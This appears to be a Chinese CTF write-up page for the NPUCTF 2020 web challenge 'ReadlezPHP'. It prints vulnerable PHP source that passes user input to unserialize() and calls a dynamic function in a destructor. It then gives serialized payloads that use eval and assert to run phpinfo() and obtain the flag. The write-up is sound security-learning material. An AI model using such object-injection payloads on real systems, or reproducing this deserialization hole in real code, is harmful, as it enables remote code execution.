📕 WriteUp
  • Introduction
  • NewStarCTF 2023
  • MoeCTF 2023
  • DASCTF Jul.2023
  • LitCTF 2023
  • 蓝桥杯 2023
  • NSSRound#13
  • GDOUCTF 2023
  • MoeCTF 2022
  • SWPUCTF 2022
  • SWPUCTF 2021
  • MoeCTF 2021
  • NPUCTF 2020
  • MRCTF 2020
  • GYCTF 2020
  • BJDCTF 2020
  • 网鼎杯 2020
  • CISCN 2019
  • 极客大挑战 2019
  • 安洵杯 2019
  • 强网杯 2019
  • SUCTF 2019
  • De1CTF 2019
  • SWPUCTF 2019
  • ZJCTF 2019
  • RoarCTF 2019
  • GWCTF 2019
  • GXYCTF 2019
  • WesternCTF 2018
  • HCTF 2018
  • 护网杯 2018
  • 网鼎杯 2018
  • BUUCTF 2018
Powered by GitBook
On this page
  • Web
  • ReadlezPHP

NPUCTF 2020

Web

ReadlezPHP

查看源代码可以发现 a 标签 <a href="./time.php?source"></a> ,访问后可以得到如下代码。

<?php
#error_reporting(0);
class HelloPhp
{
    public $a;
    public $b;
    public function __construct(){
        $this->a = "Y-m-d h:i:s";
        $this->b = "date";
    }
    public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
    }
}
$c = new HelloPhp;

if(isset($_GET['source']))
{
    highlight_file(__FILE__);
    die(0);
}

@$ppp = unserialize($_GET["data"]);

通过构造 Payload 如下

data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:4:"eval";}

回显 500 ,估计被过滤了,修改 Payload 如下

data=O:8:"HelloPhp":2:{s:1:"a";s:9:"phpinfo()";s:1:"b";s:6:"assert";}

就可以找到 flag 了。

PreviousMoeCTF 2021NextMRCTF 2020

Last updated 1 year ago